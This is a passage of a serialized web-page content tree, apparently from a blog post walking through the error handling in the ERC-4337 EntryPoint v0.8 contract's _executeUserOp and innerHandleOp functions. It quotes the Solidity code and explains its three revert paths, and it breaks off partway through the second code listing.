(uint256 collected) {\n [...]\n bool success;\n {\n [...]\n if (methodSig == IAccountExecute.executeUserOp.selector) {\n bytes memory executeUserOp = abi.encodeCall(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n innerCall = abi.encodeCall(this.innerHandleOp, (executeUserOp, opInfo, context));\n } else\n {\n innerCall = abi.encodeCall(this.innerHandleOp, (callData, opInfo, context));\n }\n assembly (\"memory-safe\") {\n success := call(gas(), address(), 0, add(innerCall, 0x20), mload(innerCall), 0, 32)\n collected := mload(0)\n }\n _restoreFreePtr(saveFreePtr);\n }\n if (!success) {\n [...]\n if (innerRevertCode == INNER_OUT_OF_GAS) {\n // handleOps was called with gas limit too low. abort entire bundle.\n // can only be caused by bundler (leaving not enough gas for inner call)\n revert FailedOp(opIndex, \"AA95 out of gas\");\n } else if (innerRevertCode == INNER_REVERT_LOW_PREFUND) {\n // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n uint256 actualGasCost = opInfo.prefund;\n _emitPrefundTooLow(opInfo);\n _emitUserOperationEvent(opInfo, false, actualGasCost, actualGas);\n collected = actualGasCost;\n } else {\n [...]\n collected = _postExecution(\n IPaymaster.PostOpMode.postOpReverted,\n opInfo,\n context,\n actualGas\n );\n }\n }\n }\n",[111372],{"type":24,"tag":145,"props":111373,"children":111374},{"__ignoreMap":7},[111375,111391,111407,111427,111444,111451,111464,111488,111496,111509,111516,111523,111544,111583,111620,111632,111639,111675,111682,111703,111792,111821,111828,111841,111848,111868,111875,111896,111904,111912,111939,111967,111975,112018,112038,112051,112073,112089,112104,112111,112131,112139,112147,112155,112163,112171,112178,112185],{"type":24,"tag":301,"props":111376,"children":111377},{"class":303,"line":304},[111378,111382,111387],{"type":24,"tag":301,"props":111379,"children":111380},{"style":348},[111381],{"type":30,"value":96533},{"type":24,"tag":301,"props":111383,"children":111384},{"style":314},[111385],{"type":30,"value":111386}," _executeUserOp",{"type":24,"tag":301,"props":111388,"children":111389},{"style":359},[111390],{"type":30,"value":1707},{"type":24,"tag":301,"props":111392,"children":111393},{"class":303,"line":320},[111394,111398,111403],{"type":24,"tag":301,"props":111395,"children":111396},{"style":10246},[111397],{"type":30,"value":96710},{"type":24,"tag":301,"props":111399,"children":111400},{"style":369},[111401],{"type":30,"value":111402}," opIndex",{"type":24,"tag":301,"props":111404,"children":111405},{"style":359},[111406],{"type":30,"value":1729},{"type":24,"tag":301,"props":111408,"children":111409},{"class":303,"line":335},[111410,111415,111419,111423],{"type":24,"tag":301,"props":111411,"children":111412},{"style":348},[111413],{"type":30,"value":111414}," PackedUserOperation",{"type":24,"tag":301,"props":111416,"children":111417},{"style":348},[111418],{"type":30,"value":109706},{"type":24,"tag":301,"props":111420,"children":111421},{"style":369},[111422],{"type":30,"value":109711},{"type":24,"tag":301,"props":111424,"children":111425},{"style":359},[111426],{"type":30,"value":1729},{"type":24,"tag":301,"props":111428,"children":111429},{"class":303,"line":344},[111430,111435,111439],{"type":24,"tag":301,"props":111431,"children":111432},{"style":348},[111433],{"type":30,"value":111434}," UserOpInfo",{"type":24,"tag":301,"props":111436,"children":111437},{"style":348},[111438],{"type":30,"value":109774},{"type":24,"tag":301,"props":111440,"children":111441},{"style":369},[111442],{"type":30,"value":111443}," opInfo\n",{"type":24,"tag":301,"props":111445,"children":111446},{"class":303,"line":401},[111447],{"type":24,"tag":301,"props":111448,"children":111449},{"style":359},[111450],{"type":30,"value":30677},{"type":24,"tag":301,"props":111452,"children":111453},{"class":303,"line":415},[111454,111459],{"type":24,"tag":301,"props":111455,"children":111456},{"style":348},[111457],{"type":30,"value":111458}," internal",{"type":24,"tag":301,"props":111460,"children":111461},{"style":348},[111462],{"type":30,"value":111463}," virtual\n",{"type":24,"tag":301,"props":111465,"children":111466},{"class":303,"line":439},[111467,111471,111475,111479,111484],{"type":24,"tag":301,"props":111468,"children":111469},{"style":308},[111470],{"type":30,"value":53245},{"type":24,"tag":301,"props":111472,"children":111473},{"style":359},[111474],{"type":30,"value":873},{"type":24,"tag":301,"props":111476,"children":111477},{"style":10246},[111478],{"type":30,"value":52904},{"type":24,"tag":301,"props":111480,"children":111481},{"style":369},[111482],{"type":30,"value":111483}," collected",{"type":24,"tag":301,"props":111485,"children":111486},{"style":359},[111487],{"type":30,"value":398},{"type":24,"tag":301,"props":111489,"children":111490},{"class":303,"line":447},[111491],{"type":24,"tag":301,"props":111492,"children":111493},{"style":359},[111494],{"type":30,"value":111495}," [...]\n",{"type":24,"tag":301,"props":111497,"children":111498},{"class":303,"line":476},[111499,111504],{"type":24,"tag":301,"props":111500,"children":111501},{"style":10246},[111502],{"type":30,"value":111503}," bool",{"type":24,"tag":301,"props":111505,"children":111506},{"style":359},[111507],{"type":30,"value":111508}," success;\n",{"type":24,"tag":301,"props":111510,"children":111511},{"class":303,"line":495},[111512],{"type":24,"tag":301,"props":111513,"children":111514},{"style":359},[111515],{"type":30,"value":38411},{"type":24,"tag":301,"props":111517,"children":111518},{"class":303,"line":504},[111519],{"type":24,"tag":301,"props":111520,"children":111521},{"style":359},[111522],{"type":30,"value":111495},{"type":24,"tag":301,"props":111524,"children":111525},{"class":303,"line":512},[111526,111530,111535,111539],{"type":24,"tag":301,"props":111527,"children":111528},{"style":308},[111529],{"type":30,"value":65516},{"type":24,"tag":301,"props":111531,"children":111532},{"style":359},[111533],{"type":30,"value":111534}," (methodSig ",{"type":24,"tag":301,"props":111536,"children":111537},{"style":385},[111538],{"type":30,"value":607},{"type":24,"tag":301,"props":111540,"children":111541},{"style":359},[111542],{"type":30,"value":111543}," IAccountExecute.executeUserOp.selector) {\n",{"type":24,"tag":301,"props":111545,"children":111546},{"class":303,"line":592},[111547,111552,111556,111561,111565,111569,111573,111578],{"type":24,"tag":301,"props":111548,"children":111549},{"style":10246},[111550],{"type":30,"value":111551}," bytes",{"type":24,"tag":301,"props":111553,"children":111554},{"style":348},[111555],{"type":30,"value":109774},{"type":24,"tag":301,"props":111557,"children":111558},{"style":359},[111559],{"type":30,"value":111560}," executeUserOp ",{"type":24,"tag":301,"props":111562,"children":111563},{"style":385},[111564],{"type":30,"value":523},{"type":24,"tag":301,"props":111566,"children":111567},{"style":348},[111568],{"type":30,"value":110371},{"type":24,"tag":301,"props":111570,"children":111571},{"style":359},[111572],{"type":30,"value":206},{"type":24,"tag":301,"props":111574,"children":111575},{"style":314},[111576],{"type":30,"value":111577},"encodeCall",{"type":24,"tag":301,"props":111579,"children":111580},{"style":359},[111581],{"type":30,"value":111582},"(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n",{"type":24,"tag":301,"props":111584,"children":111585},{"class":303,"line":619},[111586,111591,111595,111599,111603,111607,111611,111615],{"type":24,"tag":301,"props":111587,"children":111588},{"style":359},[111589],{"type":30,"value":111590}," innerCall ",{"type":24,"tag":301,"props":111592,"children":111593},{"style":385},[111594],{"type":30,"value":523},{"type":24,"tag":301,"props":111596,"children":111597},{"style":348},[111598],{"type":30,"value":110371},{"type":24,"tag":301,"props":111600,"children":111601},{"style":359},[111602],{"type":30,"value":206},{"type":24,"tag":301,"props":111604,"children":111605},{"style":314},[111606],{"type":30,"value":111577},{"type":24,"tag":301,"props":111608,"children":111609},{"style":359},[111610],{"type":30,"value":362},{"type":24,"tag":301,"props":111612,"children":111613},{"style":348},[111614],{"type":30,"value":8801},{"type":24,"tag":301,"props":111616,"children":111617},{"style":359},[111618],{"type":30,"value":111619},".innerHandleOp, (executeUserOp, opInfo, context));\n",{"type":24,"tag":301,"props":111621,"children":111622},{"class":303,"line":635},[111623,111627],{"type":24,"tag":301,"props":111624,"children":111625},{"style":359},[111626],{"type":30,"value":77307},{"type":24,"tag":301,"props":111628,"children":111629},{"style":308},[111630],{"type":30,"value":111631},"else\n",{"type":24,"tag":301,"props":111633,"children":111634},{"class":303,"line":643},[111635],{"type":24,"tag":301,"props":111636,"children":111637},{"style":359},[111638],{"type":30,"value":38447},{"type":24,"tag":301,"props":111640,"children":111641},{"class":303,"line":652},[111642,111646,111650,111654,111658,111662,111666,111670],{"type":24,"tag":301,"props":111643,"children":111644},{"style":359},[111645],{"type":30,"value":111590},{"type":24,"tag":301,"props":111647,"children":111648},{"style":385},[111649],{"type":30,"value":523},{"type":24,"tag":301,"props":111651,"children":111652},{"style":348},[111653],{"type":30,"value":110371},{"type":24,"tag":301,"props":111655,"children":111656},{"style":359},[111657],{"type":30,"value":206},{"type":24,"tag":301,"props":111659,"children":111660},{"style":314},[111661],{"type":30,"value":111577},{"type":24,"tag":301,"props":111663,"children":111664},{"style":359},[111665],{"type":30,"value":362},{"type":24,"tag":301,"props":111667,"children":111668},{"style":348},[111669],{"type":30,"value":8801},{"type":24,"tag":301,"props":111671,"children":111672},{"style":359},[111673],{"type":30,"value":111674},".innerHandleOp, (callData, opInfo, context));\n",{"type":24,"tag":301,"props":111676,"children":111677},{"class":303,"line":666},[111678],{"type":24,"tag":301,"props":111679,"children":111680},{"style":359},[111681],{"type":30,"value":65600},{"type":24,"tag":301,"props":111683,"children":111684},{"class":303,"line":674},[111685,111690,111694,111699],{"type":24,"tag":301,"props":111686,"children":111687},{"style":314},[111688],{"type":30,"value":111689}," assembly",{"type":24,"tag":301,"props":111691,"children":111692},{"style":359},[111693],{"type":30,"value":873},{"type":24,"tag":301,"props":111695,"children":111696},{"style":329},[111697],{"type":30,"value":111698},"\"memory-safe\"",{"type":24,"tag":301,"props":111700,"children":111701},{"style":359},[111702],{"type":30,"value":398},{"type":24,"tag":301,"props":111704,"children":111705},{"class":303,"line":692},[111706,111711,111715,111719,111723,111728,111732,111736,111740,111744,111748,111752,111757,111762,111766,111771,111776,111780,111784,111788],{"type":24,"tag":301,"props":111707,"children":111708},{"style":359},[111709],{"type":30,"value":111710}," success ",{"type":24,"tag":301,"props":111712,"children":111713},{"style":385},[111714],{"type":30,"value":28376},{"type":24,"tag":301,"props":111716,"children":111717},{"style":314},[111718],{"type":30,"value":47698},{"type":24,"tag":301,"props":111720,"children":111721},{"style":359},[111722],{"type":30,"value":362},{"type":24,"tag":301,"props":111724,"children":111725},{"style":314},[111726],{"type":30,"value":111727},"gas",{"type":24,"tag":301,"props":111729,"children":111730},{"style":359},[111731],{"type":30,"value":25153},{"type":24,"tag":301,"props":111733,"children":111734},{"style":10246},[111735],{"type":30,"value":39391},{"type":24,"tag":301,"props":111737,"children":111738},{"style":359},[111739],{"type":30,"value":25153},{"type":24,"tag":301,"props":111741,"children":111742},{"style":466},[111743],{"type":30,"value":584},{"type":24,"tag":301,"props":111745,"children":111746},{"style":359},[111747],{"type":30,"value":377},{"type":24,"tag":301,"props":111749,"children":111750},{"style":314},[111751],{"type":30,"value":16443},{"type":24,"tag":301,"props":111753,"children":111754},{"style":359},[111755],{"type":30,"value":111756},"(innerCall, ",{"type":24,"tag":301,"props":111758,"children":111759},{"style":466},[111760],{"type":30,"value":111761},"0x20",{"type":24,"tag":301,"props":111763,"children":111764},{"style":359},[111765],{"type":30,"value":21967},{"type":24,"tag":301,"props":111767,"children":111768},{"style":314},[111769],{"type":30,"value":111770},"mload",{"type":24,"tag":301,"props":111772,"children":111773},{"style":359},[111774],{"type":30,"value":111775},"(innerCall), ",{"type":24,"tag":301,"props":111777,"children":111778},{"style":466},[111779],{"type":30,"value":584},{"type":24,"tag":301,"props":111781,"children":111782},{"style":359},[111783],{"type":30,"value":377},{"type":24,"tag":301,"props":111785,"children":111786},{"style":466},[111787],{"type":30,"value":67061},{"type":24,"tag":301,"props":111789,"children":111790},{"style":359},[111791],{"type":30,"value":791},{"type":24,"tag":301,"props":111793,"children":111794},{"class":303,"line":3631},[111795,111800,111804,111809,111813,111817],{"type":24,"tag":301,"props":111796,"children":111797},{"style":359},[111798],{"type":30,"value":111799}," collected ",{"type":24,"tag":301,"props":111801,"children":111802},{"style":385},[111803],{"type":30,"value":28376},{"type":24,"tag":301,"props":111805,"children":111806},{"style":314},[111807],{"type":30,"value":111808}," mload",{"type":24,"tag":301,"props":111810,"children":111811},{"style":359},[111812],{"type":30,"value":362},{"type":24,"tag":301,"props":111814,"children":111815},{"style":466},[111816],{"type":30,"value":584},{"type":24,"tag":301,"props":111818,"children":111819},{"style":359},[111820],{"type":30,"value":791},{"type":24,"tag":301,"props":111822,"children":111823},{"class":303,"line":3639},[111824],{"type":24,"tag":301,"props":111825,"children":111826},{"style":359},[111827],{"type":30,"value":65600},{"type":24,"tag":301,"props":111829,"children":111830},{"class":303,"line":3647},[111831,111836],{"type":24,"tag":301,"props":111832,"children":111833},{"style":314},[111834],{"type":30,"value":111835}," _restoreFreePtr",{"type":24,"tag":301,"props":111837,"children":111838},{"style":359},[111839],{"type":30,"value":111840},"(saveFreePtr);\n",{"type":24,"tag":301,"props":111842,"children":111843},{"class":303,"line":3685},[111844],{"type":24,"tag":301,"props":111845,"children":111846},{"style":359},[111847],{"type":30,"value":3345},{"type":24,"tag":301,"props":111849,"children":111850},{"class":303,"line":3713},[111851,111855,111859,111863],{"type":24,"tag":301,"props":111852,"children":111853},{"style":308},[111854],{"type":30,"value":3285},{"type":24,"tag":301,"props":111856,"children":111857},{"style":359},[111858],{"type":30,"value":873},{"type":24,"tag":301,"props":111860,"children":111861},{"style":385},[111862],{"type":30,"value":2485},{"type":24,"tag":301,"props":111864,"children":111865},{"style":359},[111866],{"type":30,"value":111867},"success) {\n",{"type":24,"tag":301,"props":111869,"children":111870},{"class":303,"line":3721},[111871],{"type":24,"tag":301,"props":111872,"children":111873},{"style":359},[111874],{"type":30,"value":111495},{"type":24,"tag":301,"props":111876,"children":111877},{"class":303,"line":3751},[111878,111882,111887,111891],{"type":24,"tag":301,"props":111879,"children":111880},{"style":308},[111881],{"type":30,"value":65516},{"type":24,"tag":301,"props":111883,"children":111884},{"style":359},[111885],{"type":30,"value":111886}," (innerRevertCode ",{"type":24,"tag":301,"props":111888,"children":111889},{"style":385},[111890],{"type":30,"value":607},{"type":24,"tag":301,"props":111892,"children":111893},{"style":359},[111894],{"type":30,"value":111895}," INNER_OUT_OF_GAS) {\n",{"type":24,"tag":301,"props":111897,"children":111898},{"class":303,"line":3782},[111899],{"type":24,"tag":301,"props":111900,"children":111901},{"style":1062},[111902],{"type":30,"value":111903}," // handleOps was called with gas limit too low. abort entire bundle.\n",{"type":24,"tag":301,"props":111905,"children":111906},{"class":303,"line":3791},[111907],{"type":24,"tag":301,"props":111908,"children":111909},{"style":1062},[111910],{"type":30,"value":111911}," // can only be caused by bundler (leaving not enough gas for inner call)\n",{"type":24,"tag":301,"props":111913,"children":111914},{"class":303,"line":3819},[111915,111920,111925,111930,111935],{"type":24,"tag":301,"props":111916,"children":111917},{"style":308},[111918],{"type":30,"value":111919}," revert",{"type":24,"tag":301,"props":111921,"children":111922},{"style":314},[111923],{"type":30,"value":111924}," FailedOp",{"type":24,"tag":301,"props":111926,"children":111927},{"style":359},[111928],{"type":30,"value":111929},"(opIndex, ",{"type":24,"tag":301,"props":111931,"children":111932},{"style":329},[111933],{"type":30,"value":111934},"\"AA95 out of gas\"",{"type":24,"tag":301,"props":111936,"children":111937},{"style":359},[111938],{"type":30,"value":589},{"type":24,"tag":301,"props":111940,"children":111941},{"class":303,"line":4397},[111942,111946,111950,111954,111958,111962],{"type":24,"tag":301,"props":111943,"children":111944},{"style":359},[111945],{"type":30,"value":77307},{"type":24,"tag":301,"props":111947,"children":111948},{"style":308},[111949],{"type":30,"value":10144},{"type":24,"tag":301,"props":111951,"children":111952},{"style":308},[111953],{"type":30,"value":22574},{"type":24,"tag":301,"props":111955,"children":111956},{"style":359},[111957],{"type":30,"value":111886},{"type":24,"tag":301,"props":111959,"children":111960},{"style":385},[111961],{"type":30,"value":607},{"type":24,"tag":301,"props":111963,"children":111964},{"style":359},[111965],{"type":30,"value":111966}," INNER_REVERT_LOW_PREFUND) {\n",{"type":24,"tag":301,"props":111968,"children":111969},{"class":303,"line":4405},[111970],{"type":24,"tag":301,"props":111971,"children":111972},{"style":1062},[111973],{"type":30,"value":111974}," // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n",{"type":24,"tag":301,"props":111976,"children":111977},{"class":303,"line":4422},[111978,111982,111987,111991,111996,112000,112005,112009,112013],{"type":24,"tag":301,"props":111979,"children":111980},{"style":10246},[111981],{"type":30,"value":110154},{"type":24,"tag":301,"props":111983,"children":111984},{"style":359},[111985],{"type":30,"value":111986}," actualGas ",{"type":24,"tag":301,"props":111988,"children":111989},{"style":385},[111990],{"type":30,"value":523},{"type":24,"tag":301,"props":111992,"children":111993},{"style":359},[111994],{"type":30,"value":111995}," preGas ",{"type":24,"tag":301,"props":111997,"children":111998},{"style":385},[111999],{"type":30,"value":9253},{"type":24,"tag":301,"props":112001,"children":112002},{"style":348},[112003],{"type":30,"value":112004}," gasleft",{"type":24,"tag":301,"props":112006,"children":112007},{"style":359},[112008],{"type":30,"value":20835},{"type":24,"tag":301,"props":112010,"children":112011},{"style":385},[112012],{"type":30,"value":11206},{"type":24,"tag":301,"props":112014,"children":112015},{"style":359},[112016],{"type":30,"value":112017}," opInfo.preOpGas;\n",{"type":24,"tag":301,"props":112019,"children":112020},{"class":303,"line":4438},[112021,112025,112029,112033],{"type":24,"tag":301,"props":112022,"children":112023},{"style":10246},[112024],{"type":30,"value":110154},{"type":24,"tag":301,"props":112026,"children":112027},{"style":359},[112028],{"type":30,"value":110801},{"type":24,"tag":301,"props":112030,"children":112031},{"style":385},[112032],{"type":30,"value":523},{"type":24,"tag":301,"props":112034,"children":112035},{"style":359},[112036],{"type":30,"value":112037}," opInfo.prefund;\n",{"type":24,"tag":301,"props":112039,"children":112040},{"class":303,"line":4446},[112041,112046],{"type":24,"tag":301,"props":112042,"children":112043},{"style":314},[112044],{"type":30,"value":112045}," _emitPrefundTooLow",{"type":24,"tag":301,"props":112047,"children":112048},{"style":359},[112049],{"type":30,"value":112050},"(opInfo);\n",{"type":24,"tag":301,"props":112052,"children":112053},{"class":303,"line":4506},[112054,112059,112064,112068],{"type":24,"tag":301,"props":112055,"children":112056},{"style":314},[112057],{"type":30,"value":112058}," _emitUserOperationEvent",{"type":24,"tag":301,"props":112060,"children":112061},{"style":359},[112062],{"type":30,"value":112063},"(opInfo, ",{"type":24,"tag":301,"props":112065,"children":112066},{"style":348},[112067],{"type":30,"value":14990},{"type":24,"tag":301,"props":112069,"children":112070},{"style":359},[112071],{"type":30,"value":112072},", actualGasCost, actualGas);\n",{"type":24,"tag":301,"props":112074,"children":112075},{"class":303,"line":4566},[112076,112080,112084],{"type":24,"tag":301,"props":112077,"children":112078},{"style":359},[112079],{"type":30,"value":111799},{"type":24,"tag":301,"props":112081,"children":112082},{"style":385},[112083],{"type":30,"value":523},{"type":24,"tag":301,"props":112085,"children":112086},{"style":359},[112087],{"type":30,"value":112088}," actualGasCost;\n",{"type":24,"tag":301,"props":112090,"children":112091},{"class":303,"line":4574},[112092,112096,112100],{"type":24,"tag":301,"props":112093,"children":112094},{"style":359},[112095],{"type":30,"value":77307},{"type":24,"tag":301,"props":112097,"children":112098},{"style":308},[112099],{"type":30,"value":10144},{"type":24,"tag":301,"props":112101,"children":112102},{"style":359},[112103],{"type":30,"value":3035},{"type":24,"tag":301,"props":112105,"children":112106},{"class":303,"line":4590},[112107],{"type":24,"tag":301,"props":112108,"children":112109},{"style":359},[112110],{"type":30,"value":111495},{"type":24,"tag":301,"props":112112,"children":112113},{"class":303,"line":4599},[112114,112118,112122,112127],{"type":24,"tag":301,"props":112115,"children":112116},{"style":359},[112117],{"type":30,"value":111799},{"type":24,"tag":301,"props":112119,"children":112120},{"style":385},[112121],{"type":30,"value":523},{"type":24,"tag":301,"props":112123,"children":112124},{"style":314},[112125],{"type":30,"value":112126}," _postExecution",{"type":24,"tag":301,"props":112128,"children":112129},{"style":359},[112130],{"type":30,"value":1707},{"type":24,"tag":301,"props":112132,"children":112133},{"class":303,"line":4629},[112134],{"type":24,"tag":301,"props":112135,"children":112136},{"style":359},[112137],{"type":30,"value":112138}," IPaymaster.PostOpMode.postOpReverted,\n",{"type":24,"tag":301,"props":112140,"children":112141},{"class":303,"line":4659},[112142],{"type":24,"tag":301,"props":112143,"children":112144},{"style":359},[112145],{"type":30,"value":112146}," opInfo,\n",{"type":24,"tag":301,"props":112148,"children":112149},{"class":303,"line":4668},[112150],{"type":24,"tag":301,"props":112151,"children":112152},{"style":359},[112153],{"type":30,"value":112154}," context,\n",{"type":24,"tag":301,"props":112156,"children":112157},{"class":303,"line":4677},[112158],{"type":24,"tag":301,"props":112159,"children":112160},{"style":359},[112161],{"type":30,"value":112162}," actualGas\n",{"type":24,"tag":301,"props":112164,"children":112165},{"class":303,"line":4697},[112166],{"type":24,"tag":301,"props":112167,"children":112168},{"style":359},[112169],{"type":30,"value":112170}," );\n",{"type":24,"tag":301,"props":112172,"children":112173},{"class":303,"line":4725},[112174],{"type":24,"tag":301,"props":112175,"children":112176},{"style":359},[112177],{"type":30,"value":65600},{"type":24,"tag":301,"props":112179,"children":112180},{"class":303,"line":4733},[112181],{"type":24,"tag":301,"props":112182,"children":112183},{"style":359},[112184],{"type":30,"value":3345},{"type":24,"tag":301,"props":112186,"children":112187},{"class":303,"line":4741},[112188],{"type":24,"tag":301,"props":112189,"children":112190},{"style":359},[112191],{"type":30,"value":501},{"type":24,"tag":32,"props":112193,"children":112194},{},[112195,112197,112202,112204,112210,112212,112218,112220,112226],{"type":30,"value":112196},"During execution, the ",{"type":24,"tag":145,"props":112198,"children":112200},{"className":112199},[],[112201],{"type":30,"value":108959},{"type":30,"value":112203}," contract makes a ",{"type":24,"tag":188,"props":112205,"children":112208},{"href":112206,"rel":112207},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L222-L232",[192],[112209],{"type":30,"value":45035},{"type":30,"value":112211}," to its own ",{"type":24,"tag":145,"props":112213,"children":112215},{"className":112214},[],[112216],{"type":30,"value":112217},"innerHandleOp",{"type":30,"value":112219}," function through a low-level ",{"type":24,"tag":145,"props":112221,"children":112223},{"className":112222},[],[112224],{"type":30,"value":112225},"call()",{"type":30,"value":112227},". This is done to create a new call context for executing the user operation.",{"type":24,"tag":32,"props":112229,"children":112230},{},[112231,112233,112239,112240,112245,112247,112254,112256,112262],{"type":30,"value":112232},"If this call fails (when ",{"type":24,"tag":145,"props":112234,"children":112236},{"className":112235},[],[112237],{"type":30,"value":112238},"success",{"type":30,"value":5945},{"type":24,"tag":145,"props":112241,"children":112243},{"className":112242},[],[112244],{"type":30,"value":14990},{"type":30,"value":112246},"), the code enters an ",{"type":24,"tag":188,"props":112248,"children":112251},{"href":112249,"rel":112250},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L235-L273",[192],[112252],{"type":30,"value":112253},"error handling",{"type":30,"value":112255}," flow that checks the ",{"type":24,"tag":145,"props":112257,"children":112259},{"className":112258},[],[112260],{"type":30,"value":112261},"innerRevertCode",{"type":30,"value":112263},". There are three possible paths:",{"type":24,"tag":6246,"props":112265,"children":112266},{},[112267,112291,112309],{"type":24,"tag":2659,"props":112268,"children":112269},{},[112270,112271,112276,112277,112283,112285,112290],{"type":30,"value":8842},{"type":24,"tag":145,"props":112272,"children":112274},{"className":112273},[],[112275],{"type":30,"value":112261},{"type":30,"value":5945},{"type":24,"tag":145,"props":112278,"children":112280},{"className":112279},[],[112281],{"type":30,"value":112282},"INNER_OUT_OF_GAS",{"type":30,"value":112284},", it means the bundler didn't provide enough gas for execution. This causes the entire bundle to fail with ",{"type":24,"tag":145,"props":112286,"children":112288},{"className":112287},[],[112289],{"type":30,"value":111934},{"type":30,"value":206},{"type":24,"tag":2659,"props":112292,"children":112293},{},[112294,112295,112300,112301,112307],{"type":30,"value":8842},{"type":24,"tag":145,"props":112296,"children":112298},{"className":112297},[],[112299],{"type":30,"value":112261},{"type":30,"value":5945},{"type":24,"tag":145,"props":112302,"children":112304},{"className":112303},[],[112305],{"type":30,"value":112306},"INNER_REVERT_LOW_PREFUND",{"type":30,"value":112308},", it means the user didn't prefund enough gas. In this case, it charges the entire prefund amount as gas cost.",{"type":24,"tag":2659,"props":112310,"children":112311},{},[112312,112314,112320,112322,112328],{"type":30,"value":112313},"For any other revert reason, the code will still call ",{"type":24,"tag":145,"props":112315,"children":112317},{"className":112316},[],[112318],{"type":30,"value":112319},"_postExecution()",{"type":30,"value":112321}," but with ",{"type":24,"tag":145,"props":112323,"children":112325},{"className":112324},[],[112326],{"type":30,"value":112327},"PostOpMode.postOpReverted",{"type":30,"value":112329},". This ensures proper cleanup happens even on failure.",{"type":24,"tag":32,"props":112331,"children":112332},{},[112333,112335,112340,112342,112347,112349,112354,112356,112361],{"type":30,"value":112334},"We're particularly interested in the third error path, where ",{"type":24,"tag":145,"props":112336,"children":112338},{"className":112337},[],[112339],{"type":30,"value":112261},{"type":30,"value":112341}," is neither ",{"type":24,"tag":145,"props":112343,"children":112345},{"className":112344},[],[112346],{"type":30,"value":112282},{"type":30,"value":112348}," nor ",{"type":24,"tag":145,"props":112350,"children":112352},{"className":112351},[],[112353],{"type":30,"value":112306},{"type":30,"value":112355},". To understand this case better, let's examine how ",{"type":24,"tag":145,"props":112357,"children":112359},{"className":112358},[],[112360],{"type":30,"value":112217},{"type":30,"value":112362}," works.",{"type":24,"tag":291,"props":112364,"children":112366},{"className":11300,"code":112365,"language":11299,"meta":7,"style":7}," function innerHandleOp(\n bytes memory callData,\n UserOpInfo memory opInfo,\n bytes calldata context\n ) external returns (uint256 actualGasCost) {\n [...]\n IPaymaster.PostOpMode mode = IPaymaster.PostOpMode.opSucceeded;\n if (callData.length > 0) {\n bool success = Exec.call(mUserOp.sender, 0, callData, callGasLimit);\n if (!success) {\n uint256 freePtr = _getFreePtr();\n bytes memory result = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n if (result.length > 0) {\n emit UserOperationRevertReason(\n opInfo.userOpHash,\n mUserOp.sender,\n mUserOp.nonce,\n result\n );\n }\n _restoreFreePtr(freePtr);\n mode = IPaymaster.PostOpMode.opReverted;\n }\n }\n\n unchecked {\n uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n return _postExecution(mode, opInfo, context, actualGas);\n }\n }\n",[112367],{"type":24,"tag":145,"props":112368,"children":112369},{"__ignoreMap":7},[112370,112386,112407,112427,112443,112476,112483,112500,112524,112564,112583,112608,112642,112666,112683,112691,112699,112707,112715,112723,112730,112743,112760,112767,112774,112781,112792,112831,112847,112854],{"type":24,"tag":301,"props":112371,"children":112372},{"class":303,"line":304},[112373,112377,112382],{"type":24,"tag":301,"props":112374,"children":112375},{"style":348},[112376],{"type":30,"value":96533},{"type":24,"tag":301,"props":112378,"children":112379},{"style":314},[112380],{"type":30,"value":112381}," innerHandleOp",{"type":24,"tag":301,"props":112383,"children":112384},{"style":359},[112385],{"type":30,"value":1707},{"type":24,"tag":301,"props":112387,"children":112388},{"class":303,"line":320},[112389,112394,112398,112403],{"type":24,"tag":301,"props":112390,"children":112391},{"style":10246},[112392],{"type":30,"value":112393}," bytes",{"type":24,"tag":301,"props":112395,"children":112396},{"style":348},[112397],{"type":30,"value":109774},{"type":24,"tag":301,"props":112399,"children":112400},{"style":369},[112401],{"type":30,"value":112402}," callData",{"type":24,"tag":301,"props":112404,"children":112405},{"style":359},[112406],{"type":30,"value":1729},{"type":24,"tag":301,"props":112408,"children":112409},{"class":303,"line":335},[112410,112414,112418,112423],{"type":24,"tag":301,"props":112411,"children":112412},{"style":348},[112413],{"type":30,"value":111434},{"type":24,"tag":301,"props":112415,"children":112416},{"style":348},[112417],{"type":30,"value":109774},{"type":24,"tag":301,"props":112419,"children":112420},{"style":369},[112421],{"type":30,"value":112422}," opInfo",{"type":24,"tag":301,"props":112424,"children":112425},{"style":359},[112426],{"type":30,"value":1729},{"type":24,"tag":301,"props":112428,"children":112429},{"class":303,"line":344},[112430,112434,112438],{"type":24,"tag":301,"props":112431,"children":112432},{"style":10246},[112433],{"type":30,"value":112393},{"type":24,"tag":301,"props":112435,"children":112436},{"style":348},[112437],{"type":30,"value":109706},{"type":24,"tag":301,"props":112439,"children":112440},{"style":369},[112441],{"type":30,"value":112442}," context\n",{"type":24,"tag":301,"props":112444,"children":112445},{"class":303,"line":401},[112446,112451,112456,112460,112464,112468,112472],{"type":24,"tag":301,"props":112447,"children":112448},{"style":359},[112449],{"type":30,"value":112450}," ) ",{"type":24,"tag":301,"props":112452,"children":112453},{"style":348},[112454],{"type":30,"value":112455},"external",{"type":24,"tag":301,"props":112457,"children":112458},{"style":308},[112459],{"type":30,"value":82706},{"type":24,"tag":301,"props":112461,"children":112462},{"style":359},[112463],{"type":30,"value":873},{"type":24,"tag":301,"props":112465,"children":112466},{"style":10246},[112467],{"type":30,"value":52904},{"type":24,"tag":301,"props":112469,"children":112470},{"style":369},[112471],{"type":30,"value":110515},{"type":24,"tag":301,"props":112473,"children":112474},{"style":359},[112475],{"type":30,"value":398},{"type":24,"tag":301,"props":112477,"children":112478},{"class":303,"line":415},[112479],{"type":24,"tag":301,"props":112480,"children":112481},{"style":359},[112482],{"type":30,"value":111495},{"type":24,"tag":301,"props":112484,"children":112485},{"class":303,"line":439},[112486,112491,112495],{"type":24,"tag":301,"props":112487,"children":112488},{"style":359},[112489],{"type":30,"value":112490}," IPaymaster.PostOpMode mode ",{"type":24,"tag":301,"props":112492,"children":112493},{"style":385},[112494],{"type":30,"value":523},{"type":24,"tag":301,"props":112496,"children":112497},{"style":359},[112498],{"type":30,"value":112499}," 